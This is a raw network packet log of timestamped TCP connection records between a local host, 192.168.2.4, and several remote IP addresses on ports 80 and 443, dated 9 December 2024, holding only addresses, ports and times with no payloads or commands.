Dec 9, 2024 08:08:34.145270109 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.145381927 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.145437002 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:34.146104097 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.146158934 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.146224022 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:34.146967888 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.147034883 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:34.147068977 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.147113085 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:34.147783995 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.147861958 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:34.147891045 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.148633957 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.148677111 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:34.148744106 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.148786068 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:34.149473906 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.149518013 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:34.149573088 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.149611950 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:34.150450945 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.150489092 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:34.150559902 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.150597095 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:34.151196957 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.151261091 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:34.151304960 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:34.229269028 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:34.229306936 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:34.229379892 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:34.229389906 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:34.229480982 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:34.229490995 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:34.229582071 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:34.631686926 CET	443	49840	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:34.631757975 CET	49840	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:34.649760962 CET	49840	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:34.649780035 CET	443	49840	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:34.650002003 CET	443	49840	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:34.651407003 CET	49840	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:34.651514053 CET	49840	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:34.651520967 CET	443	49840	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:35.191668987 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:35.191730022 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:35.364818096 CET	443	49840	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:35.364943981 CET	443	49840	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:35.365005970 CET	49840	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:35.372596979 CET	49840	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:35.372613907 CET	443	49840	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:35.423127890 CET	49845	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:35.423152924 CET	443	49845	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:35.423239946 CET	49845	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:35.424810886 CET	49845	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:35.424824953 CET	443	49845	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:35.461679935 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:35.580962896 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:35.903518915 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:35.903647900 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:35.903722048 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:35.907708883 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:35.909203053 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:35.909248114 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:35.909271955 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:35.909303904 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:35.917649984 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:35.917999029 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:35.918052912 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:35.925916910 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:35.926067114 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:35.926115990 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:35.934272051 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:35.934473038 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:35.934521914 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:35.942645073 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:35.946274996 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.033369064 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.033461094 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.033545971 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.037492990 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.037605047 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.037666082 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.045872927 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.046082973 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.046128988 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.046149969 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.054193020 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.054291964 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.054322004 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.054373026 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.062639952 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.062689066 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.062693119 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.062740088 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.095829964 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.095932007 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.096000910 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.099853992 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.099910975 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.099948883 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.099987030 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.108275890 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.108496904 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.108556986 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.109769106 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:36.109812021 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:36.109894037 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:36.110246897 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:36.110263109 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:36.116632938 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.116702080 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.116741896 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.116789103 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.125003099 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.125051975 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.125081062 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.125127077 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.133321047 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.133430004 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.133455038 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.133471012 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.141642094 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.141691923 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.162977934 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.163081884 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.163151979 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.167725086 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.167735100 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.167798996 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.174108028 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.174118996 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.174180984 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.180522919 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.180677891 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.180744886 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.188705921 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.188812017 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.188870907 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.225605011 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.225688934 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.225694895 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.225733042 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.229271889 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.229322910 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.229378939 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.229423046 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.236661911 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.236710072 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.236745119 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.236785889 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.244024992 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.244074106 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.244108915 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.244206905 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.251247883 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.251341105 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.251349926 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.251399040 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.257988930 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.258107901 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.258110046 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.258162022 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.265640974 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.265686989 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.265702009 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.265732050 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.271182060 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.271250963 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.271349907 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.271401882 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.277242899 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.277303934 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.277309895 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.277348042 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.287751913 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.287761927 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.287802935 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.288902044 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.288960934 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.289014101 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.289129972 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.292872906 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.292938948 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.292994976 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.293138027 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.296855927 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.296930075 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.296967030 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.297082901 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.300776005 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.300837994 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.300955057 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.301069021 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.304734945 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.304780960 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.304843903 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.304886103 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.308576107 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.308624983 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.308736086 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.308768988 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.312282085 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.312326908 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.312371016 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.312414885 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.315994024 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.316061974 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.316138029 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.316287041 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.355243921 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.355374098 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.355428934 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.356885910 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.356935978 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.357574940 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.357620955 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.357676983 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.357712030 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.361327887 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.361470938 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.361747980 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.365056038 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.365252018 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.365299940 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.368722916 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.368839979 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.368891001 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.372427940 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.372494936 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.372553110 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.376105070 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.376213074 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.376234055 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.376250982 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.390054941 CET	49826	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:36.390624046 CET	49848	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:36.417798042 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.417913914 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.417994976 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.419186115 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.419317007 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.419361115 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.422027111 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.422084093 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.422127008 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.424922943 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.424973011 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.425038099 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.425121069 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.427699089 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.427774906 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.427824974 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.480043888 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.480098009 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.480149031 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.481180906 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.481236935 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.481304884 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.481451035 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.483740091 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.483752966 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.483793974 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.486084938 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.486212015 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.486268044 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.488398075 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.488451958 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.488471031 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.488511086 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.490823030 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.490905046 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.490976095 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.493066072 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.493192911 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.493241072 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.495376110 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.495424986 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.495541096 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.495584011 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.497658014 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.497739077 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.497788906 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.499849081 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.499907970 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.499977112 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.500020027 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.501995087 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.502132893 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.502180099 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.504152060 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.504283905 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.504340887 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.506335020 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.506385088 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.506441116 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.506480932 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.508507967 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.508647919 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.508707047 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.509568930 CET	80	49826	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:36.509624004 CET	49826	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:36.509881973 CET	80	49848	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:36.509963989 CET	49848	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:36.510593891 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.510637045 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.510725021 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.510767937 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.510998964 CET	49848	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:36.512761116 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.512895107 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.512943029 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.514931917 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.514987946 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.515045881 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.515088081 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.517083883 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.517222881 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.517263889 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.519198895 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.519264936 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.519268990 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.519319057 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.521388054 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.521495104 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.521536112 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.523513079 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.523557901 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.523613930 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.523658991 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.525613070 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.528086901 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.547282934 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.547398090 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.547446966 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.548327923 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.548430920 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.548468113 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.550496101 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:36.550549984 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:36.550585985 CET	80	49827	185.215.113.206	192.168.2.4
